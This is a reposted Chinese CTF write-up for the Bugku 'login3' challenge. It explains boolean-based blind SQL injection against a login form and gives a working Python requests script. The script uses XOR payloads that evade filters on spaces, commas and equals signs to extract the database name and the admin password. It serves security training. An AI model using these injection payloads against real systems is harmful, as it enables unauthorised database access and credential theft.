Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)

最新推荐文章于 2023-02-20 15:22:31 发布
最新推荐文章于 2023-02-20 15:22:31 发布
阅读量406 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/0yst3r-2046/p/11176746.html
版权

Day41

login3(SKCTF)

 

http://123.206.31.85:49167/
flag格式:SKCTF{xxxxxxxxxxxxx}
hint:基于布尔的SQL盲注
 
本题要点:异或运算、布尔盲注、过滤
 
打开是一个登录窗口
 
用bp抓一下包
发送至repeater
没什么新发现........
随便试试其他用户名,看看回显信息
 
 
我们可以发现
当我们随便输入一个用户名“qwe”时, 回显用户名不存在,但并没有对密码进行检验。
当我们输入用户名“admin”时,回显密码错误,则说明 是先查找匹配用户名,如果存在,再验证密码。
试试在用户名admin后加上单引号
 
 
结果还是显示用户名不存在,但是并没有报错信息...........
 
那么,我们猜测后台的验证应该是先查找输入的用户名是否存在
语句大体是这样
select password,username from users where username=”我们输入的用户名”
 
如果我们在where语句的结尾加上一个and连接的布尔判断语句,就可以根据返回值判断where条件是否成立,这个语句就可以补成:
 
where username=’admin’ and (substring(database(),1,1)=’a’)
 
如果返回值是password error,那么就说明where语句是成立的,那么我们补充的那就也是成立的,那么就可以确定数据库的第一位是a,然后再猜测第二位。
 
 
额....显示非法字符.......
 
可能是过滤了and....
继续测试发现....还过滤了空格,逗号,等号,for
空格用括号代替,等号用<>(一种不等号)代替
查阅大佬们的题解.........
发现大佬使用了异或运算^
先说一下异或运算的基本规则:
1^1=0    1^0=1   0^0=0
即 只有两个不同的布尔值运算结果为1
 
先给出脚本
  
import requests
str_all="1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/="
url="http://123.206.31.85:49167/index.php"
r=requests.session()
def database():
    result=""
    for i in range(30):
        flag = 0
        for j in str_all:
            payload="admin'^(ascii(mid(database()from({})))<>{})^0#".format(str(i),ord(j))
            data = {
                "username": payload,
                "password": "123"
            }
            s=r.post(url,data)
            print(payload)
            if "error" in s.text:
                result+=j
                print(result)
            if flag == 0:
                break
def password():
    result=""
    for i in range(40):
        flag=0
        for j in str_all:
            payload = "admin'^(ascii(mid((select(password)from(admin))from({})))<>{})^0#".format(str(i+1),ord(j))
            data = {
                "username": payload,
                "password": "123"
            }
            s=r.post(url,data)
            print(payload)
            if "error" in s.text:
                result+=j
                flag=1
                print('**************************',result)
        if flag==0:
            break
#database()
password()

 

 
解释一下payload:
 
"admin'^(ascii(mid(database()from({})))<>{})^0#"
 
1.为了绕过空格过滤,用括号隔开,过滤了等号,用不等号 <>代替,只要是布尔值就可以。
 
2.mid()函数和substring()一样,一种写法是mid(xxx,1,1),另一种是mid(xxx,from 1 for 1)但是这里过滤了for和逗号,那么怎么办呢?
因此,这里用到了ascii()取ascii码值的函数,如果传入一个字符串那么就会取第一个字符的字符的ascii码值,这就有了for的作用,并且mid()函数是可以只写from的表示从第几位往后的字符串,我们将取出的字符串在传入ascii()中取第一位,就完成了对单个字符的提取。
 
3.每个字符的ascii码判断,是否不等于给定的数字,会得到一个布尔值(0或1)再与结尾的0进行运算。
如果数据库名的第一位的ascii码值不是97,where条件是username=’admin’^1^0
 
返回值是username does not exist!
 
如果数据库名的第一位的ascii码值是97,where条件是username=’admin’^0^0
 
返回值会是password error!
 
这就构成了布尔报错注入。
 
4. 最后^0的妙用! 因为’admin’^0^0和’admin’^1^1是一样的,我们可以构造后者来看前者成立时的情况。 因为这里即使是语法错误也不会报错,有可能你输入的语句就不可能成立,但你也无法知道。
 
脚本运行结果:
 
 
拿到密码~
md5解密一下!
 
登录~得到flag
 
 
 
 
 
 
参考资料:
https://www.jianshu.com/p/aa9fabd36de1
 
 
 
 
 

转载于:https://www.cnblogs.com/0yst3r-2046/p/11176746.html

weixin_30593443
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 4376
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
BugkuCTF-WEB题login1
am_03的博客
08-29 1235
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 2996
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3330
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
百度杯”CTF比赛 十月场 login
Naptmn的博客
11-16 840
1、打开题目 打开题目发现是登录窗口,之后f12发现疑似账号密码的东西,之后输入发现确实是账号密码。 登录之后发现了一串颜文字。 2、bp抓包 因为已经找到了账号密码,所以大概率就不是注入了。之后考虑302跳转,所以进行bp抓包(记得抓的是登录后的包!!!别抓错了)。 并没有跳转,但是在response中发现一个奇怪的参数show:0,考虑是不是应该把他放到包里再来一次。试试就试试。 传递方式注意的是:上面的网址看清楚(我不知道为什么会莫名多出来几个包) show:后面加个空格 之后看response
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
2-CTF解题技能之MISC基础 二
最新发布
10-05
2-CTF解题技能之MISC基础 二
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1605
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2314
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
BugkuCTFlogin3(SKCTF)
z2bns的博客
07-17 647
BugkuCTFlogin3(SKCTF) 题目地址:http://123.206.31.85:49167/ 基于布尔盲注即可以根据返回页面判断条件真假的注入 1,本题是直接一个登陆框让你登录 随便输一个username:123 password:123提示username does not exist! 输入admin admin提示password erro...
SQL注入——POST注入和HEAD注入
weixin_46601374的博客
02-25 1585
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入。 post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,username和password之间是and连接,所以两个有一个为否返回就是否,
CTF-WEB 一个登录框SQL盲注
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1862
sql布尔盲注
CTFSQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
CTFer成长之路之CTF中的SQL注入
众生度尽,方证菩提
02-20 1378
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF_SQL】[极客大挑战 2019]LoveSQL 1
十二_的博客
10-22 1534
的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国大学生数学建模大赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
ctfhub布尔盲注
08-31
CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入的处理方式,通过观察应用程序在不同输入情况下的响应,来推断出隐藏在后台...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值